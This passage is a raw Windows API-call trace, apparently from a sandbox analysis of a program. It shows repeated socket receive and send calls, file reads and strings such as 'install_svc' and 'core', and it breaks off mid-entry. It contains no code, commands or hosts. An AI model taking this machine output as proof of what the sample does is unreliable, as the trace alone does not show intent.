lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0080.737] GetLastError () returned 0x3e5 [0080.737] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.737] strlen (_Str="install_svc") returned 0xb [0080.738] strlen (_Str="core") returned 0x4 [0080.738] strlen (_Str="install_svc") returned 0xb [0080.738] strlen (_Str="install_svc") returned 0xb [0080.738] GetCurrentThreadId () returned 0xac0 [0080.738] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.738] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.970] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0080.970] GetLastError () returned 0x3e5 [0080.970] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.970] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.972] strlen (_Str="core") returned 0x4 [0080.972] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0080.973] strlen (_Str="install_svc") returned 0xb [0080.973] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0080.973] GetCurrentThreadId () returned 0xac0 [0080.973] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0080.973] GetLastError () returned 0x3e5 [0080.973] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.973] strlen (_Str="install_svc") returned 0xb [0080.973] strlen (_Str="core") returned 0x4 [0080.973] strlen (_Str="install_svc") returned 0xb [0080.973] strlen (_Str="install_svc") returned 0xb [0080.973] GetCurrentThreadId () returned 0xac0 [0080.973] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.973] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0081.526] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0081.526] GetLastError () returned 0x3e5 [0081.526] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0081.526] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0081.527] strlen (_Str="core") returned 0x4 [0081.527] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0081.527] strlen (_Str="install_svc") returned 0xb [0081.527] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0081.528] GetCurrentThreadId () returned 0xac0 [0081.528] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0081.528] GetLastError () returned 0x3e5 [0081.528] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0081.528] strlen (_Str="install_svc") returned 0xb [0081.528] strlen (_Str="core") returned 0x4 [0081.528] strlen (_Str="install_svc") returned 0xb [0081.528] strlen (_Str="install_svc") returned 0xb [0081.528] GetCurrentThreadId () returned 0xac0 [0081.528] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0081.528] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.271] WSARecv (in: s=0x214, lpBuffers=0x516fee8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fee8*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0082.271] GetLastError () returned 0x3e5 [0082.271] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.462] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0082.462] GetLastError () returned 0x3e5 [0082.462] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.462] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.464] strlen (_Str="core") returned 0x4 [0082.464] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0082.464] strlen (_Str="install_svc") returned 0xb [0082.464] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0082.464] GetCurrentThreadId () returned 0xac0 [0082.464] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0082.464] GetLastError () returned 0x3e5 [0082.464] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.465] strlen (_Str="install_svc") returned 0xb [0082.465] strlen (_Str="core") returned 0x4 [0082.465] strlen (_Str="install_svc") returned 0xb [0082.465] strlen (_Str="install_svc") returned 0xb [0082.465] GetCurrentThreadId () returned 0xac0 [0082.465] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.465] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.696] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0082.696] GetLastError () returned 0x3e5 [0082.696] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.696] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.698] strlen (_Str="core") returned 0x4 [0082.698] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0082.698] strlen (_Str="install_svc") returned 0xb [0082.698] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0082.698] GetCurrentThreadId () returned 0xac0 [0082.698] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0082.698] GetLastError () returned 0x3e5 [0082.699] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.699] strlen (_Str="install_svc") returned 0xb [0082.699] strlen (_Str="core") returned 0x4 [0082.699] strlen (_Str="install_svc") returned 0xb [0082.699] strlen (_Str="install_svc") returned 0xb [0082.699] GetCurrentThreadId () returned 0xac0 [0082.699] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.699] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.931] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0082.931] GetLastError () returned 0x3e5 [0082.931] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.931] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.932] strlen (_Str="core") returned 0x4 [0082.932] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0082.932] strlen (_Str="install_svc") returned 0xb [0082.932] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0082.933] GetCurrentThreadId () returned 0xac0 [0082.933] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0082.933] GetLastError () returned 0x3e5 [0082.933] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.933] strlen (_Str="install_svc") returned 0xb [0082.933] strlen (_Str="core") returned 0x4 [0082.933] strlen (_Str="install_svc") returned 0xb [0082.933] strlen (_Str="install_svc") returned 0xb [0082.933] GetCurrentThreadId () returned 0xac0 [0082.933] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0082.933] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.165] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0083.165] GetLastError () returned 0x3e5 [0083.165] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.166] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.167] strlen (_Str="core") returned 0x4 [0083.167] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0083.167] strlen (_Str="install_svc") returned 0xb [0083.167] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0083.167] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.167] strlen (_Str="install_svc") returned 0xb [0083.167] strlen (_Str="core") returned 0x4 [0083.167] strlen (_Str="install_svc") returned 0xb [0083.167] strlen (_Str="install_svc") returned 0xb [0083.167] GetCurrentThreadId () returned 0xac0 [0083.167] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.167] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.459] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0083.459] GetLastError () returned 0x3e5 [0083.460] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.460] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.461] strlen (_Str="core") returned 0x4 [0083.461] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0083.461] strlen (_Str="install_svc") returned 0xb [0083.461] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0083.461] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.461] strlen (_Str="install_svc") returned 0xb [0083.461] strlen (_Str="core") returned 0x4 [0083.462] strlen (_Str="install_svc") returned 0xb [0083.462] strlen (_Str="install_svc") returned 0xb [0083.462] GetCurrentThreadId () returned 0xac0 [0083.462] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.462] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.693] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0083.693] GetLastError () returned 0x3e5 [0083.693] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.694] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.695] strlen (_Str="core") returned 0x4 [0083.695] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0083.695] strlen (_Str="install_svc") returned 0xb [0083.695] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0083.696] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.696] strlen (_Str="install_svc") returned 0xb [0083.696] strlen (_Str="core") returned 0x4 [0083.696] strlen (_Str="install_svc") returned 0xb [0083.696] strlen (_Str="install_svc") returned 0xb [0083.696] GetCurrentThreadId () returned 0xac0 [0083.696] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.696] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.928] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0083.928] GetLastError () returned 0x3e5 [0083.928] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.929] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.930] strlen (_Str="core") returned 0x4 [0083.930] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0083.930] strlen (_Str="install_svc") returned 0xb [0083.930] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0083.930] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0083.930] strlen (_Str="install_svc") returned 0xb [0083.930] strlen (_Str="core") returned 0x4 [0083.930] strlen (_Str="install_svc") returned 0xb [0083.930] strlen (_Str="install_svc") returned 0xb [0083.930] GetCurrentThreadId () returned 0xac0 [0083.930] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: 